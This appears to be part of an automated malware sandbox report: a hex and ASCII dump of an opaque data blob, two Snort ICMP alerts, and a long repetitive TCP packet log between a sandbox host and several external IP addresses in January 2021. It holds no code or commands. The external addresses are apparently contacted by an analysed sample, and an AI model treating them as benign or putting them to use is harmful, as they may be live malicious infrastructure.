                                                        Data ASCII:. . . . . . . . . . . . # . . . . . . Y . % j < t z . a . . . . . ] . . . ) Q . . . y * . . . . . [ ! . . s . . . . ] m . . . . . . b . L ( . k Z 9 | Z . ? 5 w . . F . . D . . v / . E . . g ! . . z - . . . . . l . . . . . Y . . 9 t ( . k . C O . $ . . v . Z . . . . . r o T C . n ( . Q ~ . . . . . . . . j W . h . . . . . . . . . Q . g . . w . T . e . . . . l . . . . . . . . . . # , . . . . Z . . . . c . . . | . = k . ' ] ] . 3 . ! . . . . . . . . J . . . . q . . . . > ! @ J 8 . H 6 i _ . . Y c . . A .
                                                        Data Raw:b0 2e cb d2 e7 f6 1d d9 cf ba d0 f5 23 06 ef a5 95 ab cf 59 fd 25 6a 3c 74 7a c7 61 06 1b 0a f7 92 5d b9 c7 d4 29 51 96 dd a3 79 2a 07 fd e7 d2 1a 5b 21 c6 e0 73 e6 8a c4 8e 5d 6d 2e bb d2 b4 b0 d9 62 c6 4c 28 d1 6b 5a 39 7c 5a ac 3f 35 77 93 f5 46 aa f9 44 16 1f 76 2f 03 45 cc e3 67 21 d0 c4 7a 2d 9a 20 85 f2 89 b6 6c a7 f6 8c de 84 59 e6 da 39 74 28 ba 6b c3 43 4f 1d 24 8c 9f 76

                                                        Network Behavior

                                                        Snort IDS Alerts

                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                        01/23/21-13:39:45.490121ICMP399ICMP Destination Unreachable Host Unreachable69.38.130.14192.168.2.22
                                                        01/23/21-13:39:48.480972ICMP399ICMP Destination Unreachable Host Unreachable69.38.130.14192.168.2.22

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jan 23, 2021 13:39:15.815989017 CET4916580192.168.2.22172.67.138.213
                                                        Jan 23, 2021 13:39:15.862436056 CET8049165172.67.138.213192.168.2.22
                                                        Jan 23, 2021 13:39:15.862564087 CET4916580192.168.2.22172.67.138.213
                                                        Jan 23, 2021 13:39:15.865818024 CET4916580192.168.2.22172.67.138.213
                                                        Jan 23, 2021 13:39:15.911866903 CET8049165172.67.138.213192.168.2.22
                                                        Jan 23, 2021 13:39:15.927921057 CET8049165172.67.138.213192.168.2.22
                                                        Jan 23, 2021 13:39:15.927983046 CET8049165172.67.138.213192.168.2.22
                                                        Jan 23, 2021 13:39:15.928020954 CET8049165172.67.138.213192.168.2.22
                                                        Jan 23, 2021 13:39:15.928057909 CET8049165172.67.138.213192.168.2.22
                                                        Jan 23, 2021 13:39:15.928066015 CET4916580192.168.2.22172.67.138.213
                                                        Jan 23, 2021 13:39:15.928085089 CET8049165172.67.138.213192.168.2.22
                                                        Jan 23, 2021 13:39:15.928126097 CET4916580192.168.2.22172.67.138.213
                                                        Jan 23, 2021 13:39:16.003791094 CET4916680192.168.2.22166.62.10.32
                                                        Jan 23, 2021 13:39:16.145878077 CET4916580192.168.2.22172.67.138.213
                                                        Jan 23, 2021 13:39:16.221513033 CET8049166166.62.10.32192.168.2.22
                                                        Jan 23, 2021 13:39:16.221648932 CET4916680192.168.2.22166.62.10.32
                                                        Jan 23, 2021 13:39:16.221730947 CET4916680192.168.2.22166.62.10.32
                                                        Jan 23, 2021 13:39:16.438956976 CET8049166166.62.10.32192.168.2.22
                                                        Jan 23, 2021 13:39:16.458409071 CET8049166166.62.10.32192.168.2.22
                                                        Jan 23, 2021 13:39:16.543878078 CET49167443192.168.2.22162.241.60.240
                                                        Jan 23, 2021 13:39:16.676367998 CET4916680192.168.2.22166.62.10.32
                                                        Jan 23, 2021 13:39:16.701693058 CET44349167162.241.60.240192.168.2.22
                                                        Jan 23, 2021 13:39:16.701841116 CET49167443192.168.2.22162.241.60.240
                                                        Jan 23, 2021 13:39:16.715140104 CET49167443192.168.2.22162.241.60.240
                                                        Jan 23, 2021 13:39:16.873219013 CET44349167162.241.60.240192.168.2.22
                                                        Jan 23, 2021 13:39:16.874017000 CET44349167162.241.60.240192.168.2.22
                                                        Jan 23, 2021 13:39:16.874051094 CET44349167162.241.60.240192.168.2.22
                                                        Jan 23, 2021 13:39:16.874269962 CET49167443192.168.2.22162.241.60.240
                                                        Jan 23, 2021 13:39:16.885622978 CET49167443192.168.2.22162.241.60.240
                                                        Jan 23, 2021 13:39:16.886636019 CET49168443192.168.2.22162.241.60.240
                                                        Jan 23, 2021 13:39:17.043598890 CET44349167162.241.60.240192.168.2.22
                                                        Jan 23, 2021 13:39:17.056086063 CET44349168162.241.60.240192.168.2.22
                                                        Jan 23, 2021 13:39:17.056364059 CET49168443192.168.2.22162.241.60.240
                                                        Jan 23, 2021 13:39:17.056871891 CET49168443192.168.2.22162.241.60.240
                                                        Jan 23, 2021 13:39:17.226022959 CET44349168162.241.60.240192.168.2.22
                                                        Jan 23, 2021 13:39:17.227478981 CET44349168162.241.60.240192.168.2.22
                                                        Jan 23, 2021 13:39:17.227511883 CET44349168162.241.60.240192.168.2.22
                                                        Jan 23, 2021 13:39:17.227771044 CET49168443192.168.2.22162.241.60.240
                                                        Jan 23, 2021 13:39:17.230879068 CET49168443192.168.2.22162.241.60.240
                                                        Jan 23, 2021 13:39:17.400079966 CET44349168162.241.60.240192.168.2.22
                                                        Jan 23, 2021 13:39:17.490462065 CET49169443192.168.2.22162.241.224.176
                                                        Jan 23, 2021 13:39:17.659581900 CET44349169162.241.224.176192.168.2.22
                                                        Jan 23, 2021 13:39:17.659792900 CET49169443192.168.2.22162.241.224.176
                                                        Jan 23, 2021 13:39:17.660240889 CET49169443192.168.2.22162.241.224.176
                                                        Jan 23, 2021 13:39:17.829027891 CET44349169162.241.224.176192.168.2.22
                                                        Jan 23, 2021 13:39:17.829900980 CET44349169162.241.224.176192.168.2.22
                                                        Jan 23, 2021 13:39:17.829917908 CET44349169162.241.224.176192.168.2.22
                                                        Jan 23, 2021 13:39:17.830168962 CET49169443192.168.2.22162.241.224.176
                                                        Jan 23, 2021 13:39:17.833290100 CET49169443192.168.2.22162.241.224.176
                                                        Jan 23, 2021 13:39:17.834341049 CET49170443192.168.2.22162.241.224.176
                                                        Jan 23, 2021 13:39:17.992211103 CET44349170162.241.224.176192.168.2.22
                                                        Jan 23, 2021 13:39:17.992337942 CET49170443192.168.2.22162.241.224.176
                                                        Jan 23, 2021 13:39:17.992811918 CET49170443192.168.2.22162.241.224.176
                                                        Jan 23, 2021 13:39:18.002064943 CET44349169162.241.224.176192.168.2.22
                                                        Jan 23, 2021 13:39:18.150661945 CET44349170162.241.224.176192.168.2.22
                                                        Jan 23, 2021 13:39:18.151954889 CET44349170162.241.224.176192.168.2.22
                                                        Jan 23, 2021 13:39:18.152057886 CET44349170162.241.224.176192.168.2.22
                                                        Jan 23, 2021 13:39:18.152199030 CET49170443192.168.2.22162.241.224.176
                                                        Jan 23, 2021 13:39:18.155324936 CET49170443192.168.2.22162.241.224.176
                                                        Jan 23, 2021 13:39:18.271919012 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.313270092 CET44349170162.241.224.176192.168.2.22
                                                        Jan 23, 2021 13:39:18.345242977 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.345374107 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.345472097 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.418656111 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.424928904 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.424966097 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.424997091 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.425024033 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.425026894 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.425060987 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.425100088 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.425101995 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.425132036 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.425152063 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.425159931 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.425193071 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.425209999 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.425266981 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.425348997 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.498704910 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.498753071 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.498796940 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.498841047 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.498886108 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.498929024 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.498934984 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.498966932 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.498980045 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.499023914 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.499026060 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.499068975 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.499100924 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.499114037 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.499157906 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.499188900 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.499198914 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.499243021 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.499273062 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.499284983 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.499332905 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.499355078 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.499377966 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.499419928 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.499447107 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.499463081 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.499505997 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.499531031 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.499547005 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.499617100 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.573055983 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.573112965 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.573164940 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.573215961 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.573266029 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.573318958 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.573348999 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.573368073 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.573380947 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.573451042 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.573512077 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.573568106 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.573580980 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.573618889 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.573668003 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.573669910 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.573719025 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.573751926 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.573769093 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.573822975 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.573856115 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.573880911 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.573936939 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.573978901 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.573990107 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.574069977 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.574079990 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.574150085 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.574202061 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.574249983 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.574254990 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.574301004 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.574325085 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.574352026 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.574407101 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.574424028 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.574460030 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.574508905 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.574532986 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.574558973 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.574609041 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.574646950 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.574656963 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.574707985 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.574728966 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.574759007 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.574815035 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.574835062 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.574870110 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.574918985 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.574944019 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.574970961 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.575020075 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.575041056 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.575068951 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.575119972 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.575138092 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.575171947 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.575238943 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.579581022 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.648665905 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.648727894 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.648778915 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.648828030 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.648976088 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.649007082 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.649045944 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.649102926 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.649153948 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.649192095 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.649203062 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.649255991 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.649290085 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.649307966 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.649367094 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.649389982 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.649450064 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.649503946 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.649552107 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.649554014 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.649606943 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.649627924 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.649657965 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.649713993 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.649729967 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.649768114 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.649817944 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.649844885 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.649871111 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.649923086 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.649950981 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.649971962 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.650022030 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.650042057 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.650074959 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.650130033 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.650146961 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.650185108 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.650233030 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.650253057 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.650285006 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.650335073 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.650356054 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.650384903 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.650434971 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.650459051 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.650485039 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.650541067 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.650557041 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.650594950 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.650664091 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.652045965 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.653040886 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.653098106 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.653162956 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.653172970 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.653217077 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.653268099 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.653292894 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.653318882 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.653369904 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.653394938 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.653459072 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.653511047 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.653531075 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.653565884 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.653636932 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.653661966 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.653738976 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.653793097 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.653810978 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.653844118 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.653919935 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.654803038 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.724097013 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.724158049 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.724215031 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.724268913 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.724360943 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.724394083 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.724427938 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.724483013 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.724531889 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.724565983 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.724582911 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.724633932 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.724667072 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.724684954 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.724736929 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.724765062 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.724787951 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.724844933 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.724873066 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.724900961 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.724950075 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.724977970 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.725001097 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.725050926 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.725074053 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.725100040 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.725172043 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.725363970 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.725442886 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.725492954 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.725522995 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.725544930 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.725595951 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.725620985 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.725652933 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.725706100 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.725723028 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.725756884 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.725807905 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.725826025 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.725861073 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.725912094 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.725931883 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.725963116 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.726012945 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.726037979 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.726070881 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.726124048 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.726144075 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.726176023 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.726247072 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.727144957 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.727209091 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.727305889 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.727770090 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.728040934 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.728096008 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.728143930 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.728178024 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.728243113 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.728321075 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.728322983 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.728373051 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.728423119 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.728445053 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.728475094 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.728523970 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.728549957 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.728574038 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.728624105 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.728642941 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.728682041 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.728753090 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.730248928 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.798609018 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.798670053 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.798719883 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.798762083 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.798800945 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.798841000 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.798885107 CET4917180192.168.2.2245.143.97.183
